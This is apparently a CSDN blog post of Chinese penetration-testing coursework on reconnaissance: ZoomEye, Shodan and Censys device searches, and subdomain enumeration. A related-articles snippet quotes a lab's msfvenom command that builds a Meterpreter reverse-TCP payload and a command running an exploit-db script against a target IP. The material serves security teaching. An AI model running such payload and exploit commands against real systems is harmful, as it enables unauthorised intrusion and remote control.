网络渗透课实践作业-2

最新推荐文章于 2024-08-09 09:30:13 发布
最新推荐文章于 2024-08-09 09:30:13 发布
阅读量56 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73942138/article/details/134423799
版权

一.利用ZoomEye进行相关搜索。

ZoomEye是一个网络安全搜索引擎,它通过使用各种网络协议和技术来扫描和检索各种网络设备。还可以提供有关设备的基本信息,这些信息对于网络安全评估和漏洞分析非常有用。

比如在zoomeye里搜索Cisco,就可以得到部分Cisco摄像头的信息。可以切换不同视角查看粗略的统计信息

 点击相应的设备可以查看相关设备的详细信息,包括IP地址、开放端口、操作系统、软件版本以及相关漏洞。

 这些设备信息和相关漏洞就能够用来供他人进行安全评估和研究分析。

除了zoomeye,还有许多其他的网络安全搜索引擎:

https://www.shodan.io
https://search.censys.io

二.子域名的收集

子域名可以通过搜索引擎直接查找已经爬取的子域名,比如运用搜索引擎语法site:将搜索范围限定在特定的站点中。

 

 子域名还可以通过一些在线的子域名查询网站进行收集,比如:

https://crt.sh/
https://tools.yum6.cn/Tools/urlblast/
https://tool.chinaz.com/subdomain/

输入要查询的子域名即可 

 

谰苷鑾澪醴
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络渗透作业
qq_67829282的博客
03-16 2986
1、Whois查询 whois是一个标准的互联网协议,在whois查询中,能找到很多跟域名有关的信息,例如域名注册时间,域名所有人,一般的小型网站域名所有人是网站管理员。 常用的查询网址有爱站(https://whois.aizhan.com)站长之家(http://whois.chinaz.com)和Virus Total(https://www.virustotal.com) 2、通过搜索引擎收集敏感信息 Google是世界上最强的搜索引擎之-对一位渗透测试者而言,它可能是款绝住的黑客工具,我们
网络渗透实验1
mny38450的博客
12-13 327
实验目的 理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 实验内容、原理 系统环境:Kali Linux 2、Windows 网络环境:交换网络结构 实验工具:Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等 3. 实验过程 1.用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档。 ...
渗透测试作业3
qq_73604266的博客
11-16 73
例如:搜索Cisco +country:"CN"(Cisco中国地区),可以得到Cisco中国地区的相关设备信息。ZoomEye(钟馗之眼)是一个强大的网络空间搜索引擎,可以按输入搜索到各种联网设备。①与Zoomeye功能类似的搜索引擎还有那些?②利用Zoomeye进行相关搜索并截图。在线爆破目标网站子域名。
网络渗透测试作业
weixin_51939939的博客
12-13 2518
一、WinPE启动盘制作 1、什么是winpe启动盘 winpe就是一个精简的windows系统。长期的dos无界面那种系统已经无法满足当下的需求。我们需要更方便且可视化的维护系统,那么它就诞生了。 PE启动盘 其实就是一种紧急系统,可以通过设置BIOS的启动先后顺序使PE在电脑刚启动时优先引导启动,是使用工具在Windows界面下制作的一个简易的、临时的、应急用系统。 为什么这么说呢,PE系统下,可以进行备份操作,可以安装系统,但是其他的可执行程序就只有很少才能运行。 通常我们是不使用PE系统的
网络渗透复现作业
2301_79000553的博客
12-29 395
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip地址 lport=端口号 -f exe -o /root/payload.exe。python2 /usr/share/exploitdb/exploits/windows/remote/38526.py 靶机ip 端口号。可输入指令load -l查询可以对靶机执行的指令 输入指令ls查看靶机桌面的文件。2、利用Nmap扫描发现靶机(Windows)运行了该服务。4.下载靶机上任意一个文件。
web安全大作业
09-18
web安全大作业,关于渗透测试方面,让你真正明白web安全的意义,去探索那背后的秘密。web安全找准云安全服务与解决方案提供商安全狗,全方位立体防护服务器安全.有效抗CC/抗DDOS,防黑防篡改,修复漏洞,查杀病毒,防暴力破解,全面解决安全运维难题。
网络渗透实践作业
m0_73942138的博客
11-12 39
其中可以看到kali中公有两块网卡信息:eth0是第一块网卡,但是并没有显示IP地址;l0表示的是回环地址;物理机连接校园网,Kali中查看网络配置并截图,能获得IP地址吗?物理机连接手机热点,Kali中查看网络配置并截图,能获得IP地址吗?扩展知识:更换为桥接模式以及切换网络时,网络配置发生变化,建议重启网卡,常用的重启命令。无论哪种,都要密码验证,一般密码为kali,输入并enter,然后再重启网卡即可。连接好校园网后,用同样的方式设置好网络,并查看网络配置。3、对于1、2的结果,进行总结分析。
20232906 2023-2024-2 《网络与系统攻防技术》第八次作业
mar-velous的博客
04-26 939
使用md5sum命令计算RaDa.exe的md5值,其值为caaa6985a43225a0b3add54f44a0d4c7,如图十七所示。块级封装将图片和文字居中换行图十七 计算RaDa.exe的md5值标题。
20232917白胤廷 2022-2023-2 《网络攻防实践实践7报告
weixin_51457231的博客
05-03 67
通过这次学习,使我熟悉了如何在linux系统中使用渗透攻击,通过利用CVE-2007-2447漏洞进行远程渗透攻击,深刻理解了网络攻防的一般步骤,同时还要多加强理论知识的学习,并投入大量时间去实践,才能把网络攻防技术掌握的更好。
伯克利人工智能导论cs188四层神经网络
07-22
《伯克利人工智能导论cs188:四层神经网络详解》 在人工智能领域,神经网络作为一种强大的工具,已经深深地渗透到了诸多应用中,包括图像识别、自然语言处理、推荐系统等。伯克利大学的CS188程是全球知名的人工...
2017-2018学年高中政治第一文化与社会第一框体味文化作业新必修3.pdf
11-27
综上所述,文化是人类社会不可或缺的一部分,它既体现在物质形式上,又深深渗透在人们的精神世界和日常生活中,对个体和社会的发展起着至关重要的作用。无论是教育、艺术还是日常行为,都是文化多样性和丰富性的体现...
高中思想政治教学调查问卷.doc
12-05
9. 信息获取:学生获取政治信息的途径广泛,包括传统媒体、网络和人际传播。教师应利用多种资源丰富教学内容,适应信息化时代的需求。 10. 板书设计:学生对板书的期望不一,有的希望详尽,有的则倾向于大纲式。...
小学数学信息化教学设计作业一宣贯.pdf
11-23
2. **教材分析**:强调本节是基于学生已有的知识基础,即认识梯形特征、掌握了平行四边形和三角形面积的计算,通过转化法来推导梯形面积公式。 3. **学生分析**:考虑到学生已经学习过相关图形的面积,具备初步的...
《C程序设计》程教学改革措施探索和实践.pdf
12-05
《C程序设计》程教学改革措施的探索与实践主要针对工科专业中这门重要的基础必修在传统教学中存在的问题进行改革。程的核心目标是培养学生掌握结构化程序设计思想和提升编程能力,以应对实际问题。然而,传统...
渗透测试作业
BerL1n
12-29 443
Raven:靶机下载:https://pan.baidu.com/s/18p0Jir7eH0BL1Na_6ybRtg ip地址扫描 利用kali下arp-scan -l扫出ip 服务器,这也不知道账号密码,所以无法确定其Ip地址,因为处于vm中和其他虚拟机一个段,扫描存活主机。 发现有四台存活主机,尝试发现192.168.198.137是改网站ip。 还可以用nmap去扫描 端口扫描 可...
深入探讨安全验证:OAuth2.0、Cookie与Session、JWT令牌、SSO与开放授权平台设计
最新发布
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
08-09 862
CSRF(Cross-Site Request Forgery)攻击是一种利用受害者在已经认证的状态下执行非意愿操作的攻击方式。攻击者通过诱使受害者访问恶意网站或点击恶意链接,来执行未经授权的操作,例如修改密码、进行转账等,简单来说就是,由于cookie是在浏览器共享的,所以一旦设置了cookie,那么当你打开另一个tab页的时候,也会携带过去,那么其他站点就可以使用cookie进行攻击,具体如下:比如:当你在浏览器中打开银行A的网页并成功登录后,你想要进行转账操作。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1406
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 887
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 194
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值